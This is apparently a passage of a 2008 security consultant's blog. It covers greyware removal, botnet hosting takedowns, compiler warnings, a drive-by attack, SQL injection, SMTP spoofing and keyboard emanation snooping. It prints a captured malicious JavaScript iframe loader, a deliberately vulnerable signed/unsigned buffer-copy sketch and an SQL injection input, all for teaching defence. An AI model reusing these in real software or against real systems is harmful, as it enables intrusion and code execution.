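    printf("suspended %d threads\n", freeze_process((DWORD)atoi(argv[1])));
    return 0;
}

Freeze both watchdogs this way and neither ever sees its brother die, which is exactly why the trick works.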
 
What the heck? Everything was back as it had been. Some investigation showed that there was a process that “repaired” the installation of the malware on each boot and then terminated. Ok, not a problem. I froze everything and used Autoruns to disable the loading of the process. Reboot – and everything is back as it had been. Resilient little sucker, isn’t it? Some ferreting around showed that this greyware registered as a shell extension and may well have had some shell functionality but the first thing that it tried to do was repair the install. It was at this point that I realised that this was more interesting than average. I started to dig deeper.

COM classes were registered with multiple different class IDs. Whichever you asked for, you got the same VTABLE. Cute. There were multiple self repair mechanisms and hooks into the system which seemed to exist solely to give the greyware a chance to self repair. Nice idea. The one that made me laugh was the protection for non-PE files. Something was waiting on each file in the directory and as the file was deleted, it just copied the file from the complete backup directory that was right there in plain sight. What happened if you tried to kill the backup directory? It was restored from the live copy.

So, the approach was clearly Chinese but the modules were compiled in Visual Studio with US settings. I was able to fish out some function names and other text and the writer clearly had a very good grasp of English. The servers that sourced the ads were in mainland China and some of the reporting went to Taiwan. All in all, this was pretty good work and much more resilient than most. There was no way that an average admin would have been able to remove this software.

In the end, I cleaned the system by booting to a WinPE image and manually cleared out the registry and deleted the directories that contained the greyware. Even the best self defence mechanisms don’t work when they are not loaded.

Had it been a commercial system, it would probably have made more sense to salvage the data and rebuild the box.
 
Oh, in other news, Arbor Networks say that there have been more and heavier distributed denial of service attacks this year than ever before with a peak intensity 67% above the previous high. The source? That would be Botnets… generally compromised home systems just like the one that I worked on this weekend.

So, until next time…

Signing off

Mark Long, Digital Looking Glass
 

Friday 14 November 2008

Directions in cybercrime

Something is missing today. What is it? Hundreds of millions of unwanted SPAM emails. A California based hosting company, McColo Corp, had their servers blocked from the web and the volumes of SPAM nearly halved. The move seems to have been largely orchestrated by journalists and Google.

Google has a cached copy of the McColo terms of use. The following (copyright McColo and quoted as fair use) is from there:

I) Prohibited Uses
A. Utilize the Services to send mass unsolicited e-mail to third parties.

B. Utilize the Services in connection with any illegal activity. Without limiting the general application of this rule, Users may not:

(i) Utilize the Services to copy material from third parties (including text, graphics, music, videos or other copyrightable material) without proper authorization.

(ii) Utilize the Services to misappropriate or infringe the patents, copyrights, trademarks or other intellectual property rights of any third party.

(iii) Utilize the Services to traffic in illegal drugs, illegal gambling, obscene materials or other any products or services that are prohibited under applicable law.

...

(viii) Utilize the Services to distribute, advertise or promote software or services that have the primary purpose of encouraging or facilitating unsolicited commercial e-mail or spam.

(ix) Utilize the Services to solicit or collect, or distribute, advertise or promote, e-mail address lists for the purpose of encouraging or facilitating unsolicited commercial e-mail or spam.

(x) McColo has no restrictions on contents. Adult materials, MP3s, games, and audio/video streaming are permitted. However, customers are strictly prohibited from using egg-drops, IRC bots, warez materials and shell hosting services on McColo regular network. IRC BOT controllers are not allowed on both networks.

Oh dear... It seems that they have not been enforcing these very well at all. It seems that IRC traffic used to control the botnets has routinely been routed through McColo servers. Host Exploit are making a lot of the running on this one and they claim that the payment servers for at least 40 child porn sites are being run through McColo. McColo have no restrictions on content indeed. Here is a link to a Washington Post document listing what McColo have apparently been up to. SRIZBI, the world's biggest botnet, is on there and is apparently currently uncontrolled.

An earlier disconnection (technically a depeering) of the Atrivo / Intercage servers produced a short term drop of 10% in SPAM. How short term? About 3-5 days. I would expect the drop caused by taking McColo off the air to take a little longer because there are presumably more botnets being controlled. So, what happens next?

In the short term, I see a scramble to regain control over the botnets that have been severed from their command and control systems. We may even see some of them change hands although it is increasingly clear that many of the individual gangs ultimately serve the same master.

What about the longer term? Well, I would have thought that the gangs behind the SPAM engines would be looking to safeguard their operations. In the past, the IRC control channels (and there are other channels which I can discuss if anyone is interested) have tended to go via smaller independent IRC servers who have been reluctant to terminate the control channels since this often earned them a DDOS attack - that is to say that the botnets would be turned on them as punishment. Attacks against the control channel have largely been limited to killing the channel and hoping no-one minded all that much. By taking out whole server farms at a stroke, things have ratcheted up a whole lot. I would have thought that the botmasters would be looking to move their command mechanisms somewhere much more under their control. Emil Kacperski who ran the Atrivo / Intercage organisation and Vladimir Tsastsin who ran EstDomains may or may not have been associated with the known rogue Russian Business Network - who am I to want a libel case? Certainly, many of the operations that McColo have been hosting were formerly hosted or controlled by the now depeered Russian Business Network. So, moving operations into the west was a solution to a previous problem.

This makes things interesting. If the illegal parts are all in Russia, Estonia and the Ukraine, it is fairly easy to target them as they are concentrated in one geographic area and it is possible to effectively filter traffic although not necessarily good for international relations. If they are centered in the west then the legal framework makes it easy to shut down the operations and that is not what organised crime wants. China? They have their own agenda and it would be even easier to filter the traffic. Africa? Not a lot of bandwidth in the less controlled areas and too much law in the well controlled bits.

Now, what would I do if I were a cyber criminal? Well, they keep knocking out my single points of failure. That happened before so they built in mechanisms to cope with the loss of a single IRC channel. Now the opposition are axing whole server farms. Maybe it is time to abandon centralised control in the same way that the STORM botnet did. Ok, STORM was effectively killed by the Microsoft Malicious Software Removal Tool but it took a long time to die. What if there were multiple STORM type peer to peer botnets? Presumably Microsoft would still kill them off and they would have a limited lifespan - but isn't living defined as not dying for one more day, every day? That is what I would be working on if I were a black hat.
As for how the payment side for illegal content will be handled, I wouldn't like to guess. All that I can say is that we are living in interesting times indeed.

I was asked a question by a client this week. She wondered what I thought the effect of the recession would be on cybercrime. Clearly, legitimate businesses are having to tighten their collective belts. Traditionally, SPAM has been used to sell fake medications, specifically Viagra and Cialis, and dubious services such as penis enlargement guides. These can be seen as luxury goods. We may see the mix changing, and adverts for treatments for high blood pressure and other necessary medications may start to dominate. Much of the Viagra sold over SPAM is fake and has never seen the inside of Pfizer's plant. What would happen if people bought fake medicines for life threatening conditions? You know that criminals would sell them.

As for more targeted attacks such as industrial espionage, well, the criminals will do what we all do when profits are lower. They will work harder.

Speaking of which, I have a report to write.

Signing off

Mark Long, Digital Looking Glass

Wednesday 12 November 2008

Hey, it is only a warning. How important can it be?

Caveat – only of interest to C or C++ devs today.

You might think that compiler warnings are just nagging. Well, that is mostly true. If you are in a relationship, you may well have been nagged to do the washing up or empty the kitchen bin at some point. Some nagging has a point.

I am going to be talking here about the Microsoft compilers because those are the ones that I know best, but the same principles apply to other compilers and even code checkers like Lint. Ah, those happy days when we could name tools in ways that amused us. Lint picked fluff from your code and you used DDT to kill bugs. Anyway, I digress. Compilers allow you to set the warning level that they compile your code against. If you do certain things, you will get warned. I want to talk about some of those warnings.

So, let us look at one that it is probably OK to ignore:

Compiler Warning (level 4) C4201
Error Message : nonstandard extension used : nameless struct/union

Ok, this just means that you have used something which is not supported by ANSI C++. Maybe you need this to be multiplatform in which case that is probably a bad thing. Maybe you plan to change compiler at some point in the future (which I only recommend for masochists) and you want the code to stay as portable as possible. Maybe your contract demands that you use ANSI level C++ for compliance reasons. This is a minor warning but there are some pretty good reasons for at least considering what it is telling you.

How about one that we should worry about?

Compiler Warning (level 3) C4018
Error Message: 'expression' : signed/unsigned mismatch

This one has some brothers and sisters but they have the same basic pattern. You treat something as a signed and an unsigned value. Ah, but you know that the value will only ever be 0 to 40 and so what does it matter? Well, quite a bit. Let me explain how.

Imagine that we have an application that reads a data file and makes sense of it. There are millions of applications like that. So, the data is coming from a file. Further imagine that we have a buffer which is 100 bytes long – it is char[100] so element 0 to element 99 are fine. We are going to fill it from a structure that has been passed to us. You have an integer which holds the length of the data and a pointer to part of the file. You check that the length is less than 101. Yes it is. You read that many bytes from the file and copy them into the array. You go on and do the next thing. All is well and there are millions of bits of code that do just that.

Why do you check the length? Because you don’t want to overflow the buffer. However, what happens if the length that is read from the file is -10,000 rather than 42, for example? Well, -10,000 is less than 100 so that check passes fine. The routine that copies the data takes an unsigned value, so -10,000, reinterpreted as a 16 bit unsigned number, becomes 0xD8F0 – a much larger number, 55,536 to be precise. So, you read 55,536 bytes from the file and copy them into the 100 byte array. Oops, that is the stack gone. If you are lucky, you will crash and your user will curse your name. However, that could only happen with a corrupt file since you also write the files and there are never negative lengths in there. It is, accordingly, a purely theoretical risk right up until someone writes a malicious file and mails it to your customer. Odds on, this will be a remote code execution vulnerability. It happened with dozens of products including Adobe, Microsoft and many other household names. Linux and Unix have both had this one over and over, and smarter people than me missed it.
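
In C, the whole trap fits in a few lines. A minimal sketch of the pattern described above, with invented field names, shown deliberately in its broken form:

#include <string.h>

/* Length and payload as read from an untrusted file. */
struct record {
    int  length;              /* signed, straight from the file */
    char data[65536];
};

void parse_record(const struct record *rec)
{
    char buf[100];
    if (rec->length > 100)    /* -10,000 > 100 is false, so we sail past */
        return;
    /* memcpy takes a size_t; a negative length wraps to a huge value and
       the copy tramples the stack. The fix is to also reject
       rec->length < 0, or better, treat the field as unsigned from the start
       and still bound it against sizeof(buf). */
    memcpy(buf, rec->data, (size_t)rec->length);
}

The compiler's signed/unsigned mismatch warning is pointing at exactly this kind of silent conversion.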

My recommendation is that you compile all production code at the maximum warning level and document any warnings that you can’t get rid of. I would even go so far as to say that compiler warnings should be logged as bugs so that they get fixed in the next version. You might think otherwise and that is your right... and I will sell you or your client my services when you or they hit problems as a result.
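
For the Microsoft compiler, that policy amounts to building with cl /W4 /WX (maximum warnings, warnings treated as errors) and, in the rare case where a warning genuinely cannot be fixed, suppressing it narrowly and visibly. A minimal illustration, with an invented structure name; this is the C4201 example from earlier in the post:

/* Build with:  cl /W4 /WX parser.c
   Any warning, including C4201 below, breaks the build unless it is
   explicitly suppressed - which is the "document it" part of the policy. */
#pragma warning(push)
#pragma warning(disable: 4201)   /* nameless struct/union - kept for layout compatibility */
struct legacy_header {
    union {
        struct { unsigned short lo, hi; };
        unsigned long whole;
    };
};
#pragma warning(pop)

The push/pop pair keeps the suppression scoped to the one declaration rather than silencing the warning for the rest of the translation unit.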

Signing off

Mark Long, Digital Looking Glass

Thursday 6 November 2008

Drive-by attacks, not just for the physical world

Drive-by attacks are a common way of infecting home PCs. I have mentioned them before but they are still just as popular as they were. There seem to be some changes in the approach though.

We used to routinely see attempts to infect PCs via remote code execution vulnerabilities in the browser – this was one of the holy grails for black hats. If you had one of those, you could have a “click and you are owned” scenario. The other holy grail was a remote code execution in a service that allowed anonymous exploitation – that is to say that a particular request could be made without needing to be sent from an authorised domain account. This would enable a black hat to write a worm but I digress; we are talking about drive-by attacks.

What I used to see often is that the page passed back to the browser in response to the GET request would be targeted at the browser version and at the vulnerabilities that were current or recently patched. Storm used to do this, even creating custom binaries on the fly. Now, there was a fancy piece of malware for you. What I am seeing more and more is that drive-bys just rely on social engineering. Here is the anatomy of a particular attack:

The come on:

These vary but a fairly common form (and the one that I was looking at) is a message on Facebook claiming that someone has pictures or a video of you. It seems to come from a friend but it is very nonspecific – well, it is a hijacked account and the method is to send many of these messages and expect a low success rate. Again, that is fine since none of this costs the black hats anything.
Typically, the link will go via Google (with a unique search string) or sometimes TinyURL. Most people see the start of the URL as going to a reasonable site and follow the link, if they look at all. Many don’t; these are home users.

The initial page:

This will typically just be a page of JavaScript. I have seen many dozens of variants but they generally look very similar. There is a large static array of values and then a bit of script that decodes the array into a string. The encryption is crude in every way. Typically the array will be ASCII values with a largish offset – say 605. It is easy for the black hat to choose a different offset, which means that it is not practical for pattern recognition internet security packages to look for a given pattern of values. Also, there are more ways of phrasing the code than one so the pattern is trivial to change.
The string created is then pushed through the eval function.
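
If you want to see what such a page really does without letting it anywhere near a browser, the decode step is trivial to reproduce offline. A toy sketch assuming the fixed-offset scheme described above (605 is just the example value, and the sample array here is harmless data that decodes to "iframe"):

#include <stdio.h>

/* Recover the hidden script from the static array: each entry is the
   character code plus a fixed offset chosen by the attacker. */
int main(void)
{
    const int offset = 605;                                       /* example value */
    const int encoded[] = { 710, 707, 719, 702, 714, 706 };       /* toy data      */
    size_t count = sizeof(encoded) / sizeof(encoded[0]);
    for (size_t i = 0; i < count; i++)
        putchar(encoded[i] - offset);       /* prints the script, never evals it */
    putchar('\n');
    return 0;
}

Dumping the decoded string instead of evaluating it is the whole trick: you get to read the next stage at your leisure.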

The payload 1:

Here is the code that it executes:

function uybhutgyaalih(query){
var url = 'http://(malicious URL)/go.php?sid=4';
if (window.XMLHttpRequest){
var dx = '1500px';
document.getElementById('o').style.width=dx;
document.getElementById('o').height='5000px';
document.getElementById('o').innerHTML = '(iframe border=0 scrolling=no width=100% height=2800px src='+url+')(/iframe)';
}else if(window.ActiveXObject){
var dx = '1500px';
document.getElementById('o').style.width=dx;
document.getElementById('o').height='5000px';
document.getElementById('o').innerHTML = '(iframe border=0 scrolling=no width=100% height=2800px src='+url+')(/iframe)';
}else{};
}

Well, nothing too clever there. It takes you to another site via an iframe. Why an iFrame? Because no URL will be displayed. I have obscured the URL here but there are thousands of hosts out there. Many of them are listed here. Oh, and I replaced the angle brackets with round ones because they confused the blog spot editor.

The payload 2:

This is where the link in the iframe takes you. This is where you would expect all the cleverness to be. In this case, nothing at all clever. There was a web page with a video that was (in this case) audio only. Typically, there will be the sound track of something, often a porn film. I haven’t the expertise to identify the film from the sounds. Sorry. There was a bitmap shown over the video that said that there was a missing video codec and seemed to be a typical OK/cancel dialog for XP. In fact, the whole thing was a bitmap and clicking anywhere would download the EXE installer that would give you a nice fresh copy of an Rbot variant.

So, there was nothing at all odd or especially bright about this attack. It was a typical drive-by based on social engineering. Why do the gangs use such a simple approach? Well, that would be because it works just fine. Anything more would be an unnecessary expense.

Oh, I mentioned wormable vulnerabilities. What we saw in the past was rapidly spreading worms, typically malicious and without much of a payload, although SDBot was an exception – it was actually a proper trojan client (bot) with multiple modes of operation, though it was mostly used for SPAM. Anyway, traditionally worms would spread so aggressively that they would effectively form a denial of service on the network and stop their own spread. Even if the network stayed up, admins were alerted very rapidly because of the abnormal network load. We might see fast spreading worms again but I think that they will be from amateurs. I think that the professionals will go for low and slow next time. You really want to infect as much of the network as possible before detection – and I would expect the worm to install a proper multi-purpose bot, probably polymorphic to survive better – and possibly based on Storm’s peer to peer architecture to make it more robust.

Are there interesting times ahead? I suspect so.

Signing off

Mark Long, Digital Looking Glass

Thursday 30 October 2008

Near misses

Hello all

It has been an interesting few days for me. I have been involved in a couple of things that I can talk about and a few that I can’t. So, on to the ones that are fine to chat about.

Microsoft released an out of band patch – let me remove the jargon around that. There was a security update that came out when it wasn’t a regular patch Tuesday. Patch Tuesday falls on the second Tuesday of the month except for the March before last when there weren’t any. Well, this one (MS08-067) was released on October 23, 2008 which is fairly close to the November patch date which will be the 11th – I don’t have any inside information but that would be what every system administrator expects and the MSRC blog should confirm that soon. So, this out of band patch was released pretty much in the middle of two patch cycles and that would mean that it was something special.
Well, it is. From the bulletin (and again, no special knowledge here), it was a vulnerability in the computer browser service and the server service. The question that MS always ask themselves when a vulnerability is reported or found is “Could this be used to write a networked virus, or a worm for short?” For the answer to be yes, the following things have to be true:


1. It has to be a remote code execution vulnerability.

2. It has to attack software that is running all the time on vulnerable systems

3. It can’t require user action for the exploit to work

Well, this one ticks all those boxes. It is an RPC based vulnerability. You have probably heard of a worm that used an RPC vulnerability. Blaster did that. However, this wouldn’t be as limited as Blaster since it affected more versions of Windows. Accordingly, I would advise installing this one pretty damn quickly. The proof of concept code was released on the 24th and the black hats have it now. Oh, and just to add to the fun, the malicious code would be running as SYSTEM and would be able to do what it liked to the target machine.

One of the things that I did related to this was quash a rumour that Microsoft releases viruses that exploit flaws in Microsoft software. I have heard that one so many times and it has never made sense to me. The point of malware is to put code onto the box that the attacker wrote. What a Microsoft written virus would do would be to... uh, well, patch Windows. MS already has control over what code is in Windows. As for the motive, that is even more puzzling. Do you think that Microsoft wants to steal your product keys? They already have loads. Your credit card details? I think that someone would notice. No, the main reasons that I hear behind this insane rumour are that it is to force people to install patches (uh, they are provided free, so where is the motive?) or to encourage sales of Microsoft anti-virus products.

Did you know that Microsoft markets anti-virus products? Their home anti-virus is called One Care and it is not a huge seller. The business solution is Forefront Client Security. They are decent enough products but could the profit possibly be worth doing something illegal and easily traceable to the company that is perhaps the most monitored company in America? Clearly not. Also, given the respective market shares, this would help Microsoft’s competitors much more than it would help Microsoft. Clearly, this is nonsense.

However, imagine that I believe that MS kicks puppy dogs and eats small children. Imagine that I didn’t know for a fact that MS doesn’t do these things and that they can normally be traced to some well known sources. The question would be, why on earth would Microsoft bother? There are hundreds of malware writers, maybe even thousands, who will write these things for free.

The other thing that I can mention is that I saw a SPAM email the other day. Nothing odd about that. This one read:

“Good day.
You have received an eCard

To pick up your eCard, choose from any of the following options:
Click on the following link (or copy & paste it into your web browser):

http://SomeWebsiteInFrance.com/e-card.exe

Your card will be aviailable for pick-up beginning for the next 30 days.
Please be sure to view your eCard before the days are up!

We hope you enjoy you eCard.

Thank You!

http://www.123greetings.com”

The website listed in the email was real and had been hacked using a fairly simple attack. There is nothing unusual about this as a technique, but it reminded me very much of the first wave of attacks that built the Storm botnet, now largely defunct. However, this malware proved to be the much less interesting Zbot, while Storm was an evolution of RBot. Storm was much more flexible and much more resilient than Zbot – and the malware servers were the bots themselves rather than a normal website. It did look very familiar for a moment though, as some of the early Storm campaigns used hacked websites as the hosts before the gang developed their fast flux DNS capability.

Anyway, I helped out the company that got hacked. It didn’t take long so there was no charge in this case. They wanted a French speaking consultant so all that I did was prepare enough information to hand over and let them find their own man.

So, it has been something of a week of "might have been"s.

Signing off

Mark Long, Digital Looking Glass Ltd

Monday 27 October 2008

BBC reports rise in script kiddie activity

As you may have noticed, I like to keep an eye on the mainstream media as well as the technical press. When you see a technology story appear on national news, it is either an important news story or a slow news day – but what is news to one person might be olds to another. So, the BBC report that young people are getting more involved in hacking. What triggered this comment? Why, that would be this BBC video.

What they have there is known in the trade as a Script Kiddie. They blur the screen, but it is clear that one of the forums is talking about one of the world’s easiest and commonest attacks, the SQL injection attack – there is a minimal sketch below of just how easy it is. It may be easy to do but that doesn’t make it any less effective. Quite the reverse. Some very big names have been hit by that one. So, it seems that kids are becoming more active in low level cyber crime. Let us look at the various types of hacker that might be testing your web based solutions or sending files to choke your app through email.
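
First, though, the promised sketch of why SQL injection is so easy. This is purely illustrative – the table and column names are invented, and the snippet just prints the query text rather than talking to a real database. The bug is pasting user input straight into the SQL; the cure is a parameterised query, so that the input can never be read as SQL.

    #include <iostream>
    #include <string>

    // Illustrative only: shows how the query text changes when user input is
    // concatenated straight into the SQL. The table and column names are made up.
    std::string buildLoginQuery(const std::string& userName)
    {
        // Vulnerable pattern: the input becomes part of the SQL itself.
        return "SELECT * FROM Users WHERE Name = '" + userName + "';";
    }

    int main()
    {
        // What the developer expected...
        std::cout << buildLoginQuery("alice") << "\n";
        // ...and what the script kiddie types. The WHERE clause is now always true.
        std::cout << buildLoginQuery("alice' OR '1'='1") << "\n";
        // The fix is a parameterised query (e.g. "WHERE Name = ?") so that the
        // database treats the input as data, never as SQL.
        return 0;
    }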

The Script Kiddie. The script kiddie gets very little respect. Even the journalist was not much impressed by that one. They tend to be scavengers, picking crumbs from a rich man’s table. They will use techniques that they have learned from more experienced hackers. You might think that people with useful hacking skills would keep these things as trade secrets. Well, some do and some don’t. Those that don’t feed the script kiddies. One thing that is new is that they seem to be doing this increasingly for profit. They used to “tag” websites with their screen names or just cause damage, but it seems that they are now dabbling in a little credit card fraud. Well, times are hard and pocket money is not as easy to come by. They are sometimes minors and rarely over the age of 20. 18 is often a critical age because at that point, it stops being a problem for the parents and becomes an offence against the Computer Misuse Act 1990, punishable by 6 months to 2 years in the UK. You can get longer in the US, of course. British law is rather lenient in this regard.

“Hacker” is a bit of a problematic term because you can be a hacker and never once compromise someone’s security. A hacker can just be someone who codes down near the metal which always struck me as damn good fun. Rather than hacker, let us talk about hats.

White hats are hacking for non-malicious and generally legal reasons. You can hire white hats if you want. Just look for “Penetration testers” which is what they prefer to be called. Oh, while I am on the topic, Digital Looking Glass will be launching a PenTesting service next year. Some companies combine testing and penetration testing and that gets a lot of the glitches out of the software before it is released. It makes testing very slow and expensive but you pay your money and take your choices. There are also universities that study the techniques and responsibly report flaws to the software authors.

Grey hats have the same skills and they use them for… well, other reasons. They are not normally criminals, or at worst will only break civil law rather than criminal law. As with so many things, there are shades of grey. Some will work with software vendors to get vulnerabilities fixed. Others will write exploit code and publish it to “encourage” the vendor to fix the bugs. You can bet that the script kiddies love sample code, especially when it is in a high level language that they can understand. A lot of the rootkit developers were nominal grey hats. The rootkits that we find in commercial malware (yes, there is such a thing) are normally pretty much unchanged from the sample code provided by the grey hats. The code is readily available. No, really. Don’t take my word for it – see for yourself. Just go to www.rootkit.com. You will find a lot of script kiddies begging in the forums.

There are lots of other sites for the aspiring and practising hacker. Here are a few that I have been to in the last week:

www.hackthissite.org An excellent site with graded exercises to enable anyone to learn how to crack systems. The forums are also very useful.

www.port7alliance.com/txt/hackbg.html is a bit less up to the minute but has some nice exercises for helping the scripters make progress towards the big time.

http://www.cultdeadcow.com/ The Cult of the Dead Cow is a well known group that have produced some remarkable tools, such as Goolag, which uses Google to search for vulnerable parts of sites.

http://www.governmentsecurity.org has a whole collection for a range of platforms – the formatting is not excellent but the material is generally very good.

There is plenty of material out there. If a grey hat wants to go black hat, or a script kiddie decides to play in the big time, then the techniques are no further away than your browser search bar. So, what sort of black hats are there?

There are some who work solo – not all computer users play well with others. They will typically be looking for anything that they can get. If they find a home system, they will gather credit card details if they can and pay for their web use for a while. Small amounts are likely to go unnoticed. If they get into a company network and can steal a few then they will sell them. A good solo worker with the right connections can clear $250,000, which is not too bad when you don’t file a tax return.

The black hat gang. There are some small independent groups, but generally they are run by another group. The hacker gangs are generally small, although there have been reports of larger ones in China. Some have suggested that corrupt government officials are running them. Well, I don’t know, because they don’t publish their accounts. All that can be said for sure is that the security guards standing outside were wearing Chinese military uniforms and carrying AK47s, just as the Chinese military usually do. As for the non-military ones, a lot of them are eastern European. The Solntsevskaya and Dolgopruadnanskaya organisations run multiple cybercrime gangs. They have a number of approaches. There are botnets, which are used for extortion (denial of service against websites, typically online casinos), SPAM, data gathering (passwords and credit cards) and rental. They have phishing operations too – typically against western banks but also against PayPal and similar organisations. Sometimes these are combined. I have seen spam bots churning out spam advertising stolen credit card numbers for sale. I had to get the message translated. Of course, that could well have come from the next type of black hat. Some of them will be looking for whatever they can get, working much like solo black hats. You can hire them by the hour if you know the right people.

Finally, there are state run black hats – or maybe white hats. It depends where you are standing. After all, we sponsor freedom fighters and they sponsor terrorists. A number of states definitely have some very smart people hacking for them. Is this good or bad? Well, it depends on the target. The computer that you are using depends on principles developed at Bletchley Park, Station X. That was a project to break German codes and it gave us the finite state machine. There are ethical questions there which I can’t answer.

So, the BBC may well be right in saying that younger kids are getting involved in cybercrime – but let us be honest here. It is not as if there was a shortage of cybercriminals without waiting for junior to grow up.

Interesting times indeed

Signing off,

Mark Long, Digital Looking Glass Ltd

Tuesday 21 October 2008

How private is private? Not so much.

PhD students at the Swiss Ecole Polytechnique Federale de Lausanne have been trying to sniff data as it is typed on a keyboard. That is something that they are supposed to do, since they work in the Security and Cryptography Laboratory there. They have been listening to the radio signals emitted by keyboards, including laptop keyboards. They were doing this mostly with keyboards that were not attached to PCs, to reduce the amount of radio mush in the environment. A quick attempt to recreate the experiment using a $4 radio purchased at Woolworths did not give any results, but there is no doubt that snooping of this sort can be done.

The traditional way of using a radio to snoop on a computer was to look for emanations from a CRT – a conventional monitor has an electron stream whipping backwards and forwards, painting a frame dozens of times a second. With a monochrome monitor, this was easy enough but much harder with colour – and the higher resolution made it harder still. There was a paper written by Wim van Eck, a Dutch researcher, back in 1985 which described the technique. This became known as TEMPEST (Transient Electromagnetic Pulse Emanation Standard). This wasn’t too hard from CRTs because there was a lot of power going through the monitor and accordingly a lot of radio emanations to tap into.

There was also a technique referred to as optical TEMPEST that used the same principle as the light guns on the old Nintendo Entertainment System. The electron beam swept the screen 50 times a second on a conventional TV – actually twice 25 as the frame was interlaced with half of the picture painted each time. When the trigger was pulled on the light gun, the target (for example, a duck) blinked white and the light gun would, if correctly aimed, see this in its narrowly focussed barrel with its crude light sensor. No flash? You were not aimed at the target.

However, this could be refined. You could have a very fast camera look at the screen, record the variations in its luminance and work out what was being shown on screen. OK, not so interesting because you can see the screen anyhow – but here was the kicker. You didn’t have to see the screen, only the light from the screen. That light is reflected from things in the room and can, with the right equipment, be detected from a long way off. The reflection would vary microsecond by microsecond, giving you a fuzzy rendition of the screen after much processing. Of course, none of this works with LCD monitors because they don’t scan that way. The monitor is always backlit and pixels change when they change – or more accurately, the red, green and blue elements that make up each pixel change. Because the old techniques don’t work as well with LCD monitors, research has moved on to detecting the much smaller signals output by the digital electronics. This is a trickier proposition but not impossible, as has been shown here. In practice, it would be harder still to do because computers rarely live in an electrically quiet environment. They are often surrounded by other computers and sources of radio emissions. I am writing this from home and I live in the countryside. I can “see”:

- 4 wireless networks, one of which is mine
- My mobile phone which is connected to the provider, the wireless network and via Bluetooth to a keyboard
- My PC wireless keyboard
- My PC wireless mouse
- My toothbrush (I have an Oral B Triumph and it has its own wireless network. Why yes, I am a geek. Thanks for noticing)

Because it is cold, the fan heater is on and it is generating radio mush. I am listening to one of my favourite folk singers, the room is wired for Dolby surround sound, and none of the speaker wires are shielded. Come to that, the phone line carrying the broadband that I am posting this over is not shielded either. That will be generating some noise. And that is in a quiet country location. Imagine how much worse a city office is.

Of course, there is one advantage to these radio techniques over conventional key logging software that runs on the PC: they are undetectable. Key loggers can be detected if you know how they hide. On the other hand, key loggers keep working even inside a Faraday cage, where radio snooping would not. Still happy that your system is all that private?

Signing off

Mark Long, Digital Looking Glass Ltd

Thursday 16 October 2008

1984 project delivered late? Big brother database.

You have probably seen the splashes on the news pages. The British government are considering a database that logs certain details of internet traffic. There is a report here if you missed it.

What are they considering logging? Well, let us look at what is currently logged. Details of the times, dates, durations and locations of mobile phone calls, numbers called, websites visited and addresses e-mailed are already stored by telecoms companies for 12 months. Any of these details are surrendered to an appropriate agency on request. The proposal is that these records should now be held for 2 years and be held directly by the government.

Jacqui Smith went on to say: "There are no plans for an enormous database which will contain the content of your emails, the texts that you send or the chats you have on the phone or online.”

Hmmm… let us consider what is being said here. Not the content then. What reasonable use would there be in storing the email header information only? Well, you would have the IP address it was sent from, the email account that it was sent from and the time that it was sent. That is no great trick for SMTP since it is sent in plain text by default. SMTP (mail) protocols are really just special purpose TCP/IP chatter on port 25. This stuff is defined in RFC 821 and 822. It is easy enough to log that stuff if you can record any packet on a network. You can do similar things for IMAP and POP3. So, to record this effectively you would need to be sitting on the email servers. OK. The UK government can enforce this on UK servers if they want to – you can’t fight city hall… but what if the email is not on a UK server? Hotmail is not based in the UK and I am willing to bet that it doesn’t internally use SMTP or IMAP – when sending a message from one Hotmail user to another, you are effectively doing a database operation, and that is how I would implement it if I were designing it. I bet that most web based email services such as Yahoo, Gmail and so on work that way. The UK government could ask Google to send it this data but would they? It seems unlikely. How about imail.ru (a Russian free webmail) or maktoob.com, which is in Jordan? Now, Jordan and the UK get on pretty well, but would they reasonably hand over that sort of data to the UK government? I don't think so. The Russians? Even less chance. There are hundreds of web email providers.


Oh, and here is something else that makes me wonder. You know why the industry doesn’t chase down the people who send the SPAM? Well, how would you tell who they were? It is trivial to fake an SMTP header and that is what the spammers do. There is nothing to stop the terrorists doing the same.
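
To make that concrete, here is a rough sketch of the sort of SMTP conversation a spam tool composes – every host name and address below is invented and nothing is actually sent. The point is that both the envelope sender given in MAIL FROM and the From: line inside the message body are just text chosen by the sender; basic SMTP checks neither.

    #include <iostream>
    #include <string>

    // Illustrative only - composes (but does not send) the SMTP conversation a
    // spam tool might have with a mail server. Every name and address is made up.
    int main()
    {
        std::string session =
            "HELO innocent-looking-host.example\r\n"
            "MAIL FROM:<anything-at-all@example.net>\r\n"      // envelope sender - unchecked
            "RCPT TO:<victim@example.org>\r\n"
            "DATA\r\n"
            "From: \"Your Bank\" <security@bank.example>\r\n"  // header From: - just text
            "Subject: You have received an eCard\r\n"
            "\r\n"
            "Click here...\r\n"
            ".\r\n";

        // Neither the envelope sender nor the From: header is verified by basic
        // SMTP (RFC 821/822), which is why tracing spammers by header is hopeless.
        std::cout << session;
        return 0;
    }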

How about SMS messages? Well, they are a bit different because the whole message is sent as a packet. Longer messages are sent as multiple messages and stitched back together later, it seems. The message and the header are all in the same packet. I suppose that a scheme could overwrite the message content before recording the packet to a log but I would be surprised if that were done. The Multimedia Messaging Service protocols are more complex and more problematic.

Logging all phone numbers and times of calls and the location of the caller? Well, that is pretty powerful if you know who the number represents. More than 75% of the UK population have a mobile phone. What other government can claim to be able to track 75% of their population at any time? Of course, pay-as-you-go phones can be a problem. Pop into Tesco with some cash and you can buy a phone and some air time. Name? You are not required to give it. You want a free SIM card? You can have a dozen. Companies want to give them away. Why would a terrorist use the same one twice? This measure strikes me as an excellent way of monitoring the honest and the stupid but a rotten way of monitoring the intelligent and devious. There is also the question of the sheer volume of data, as there is with emails. There are roughly 60 million people in the UK. About 75% have a mobile. That is 45 million mobiles to track. Some of those are teenagers who send dozens of texts a day. That could easily be 450 million texts per day. That is more than 160 billion texts per year. Good luck analysing that many. As for emails, that boggles the mind. There are more than 100 billion SPAM emails per day. Britain punches above her weight here because computer ownership is common. Let us say that 5% of these are in the UK. So, 5 billion SPAM emails per day. That is 1.8 trillion emails per year. Good luck storing and scanning all those.

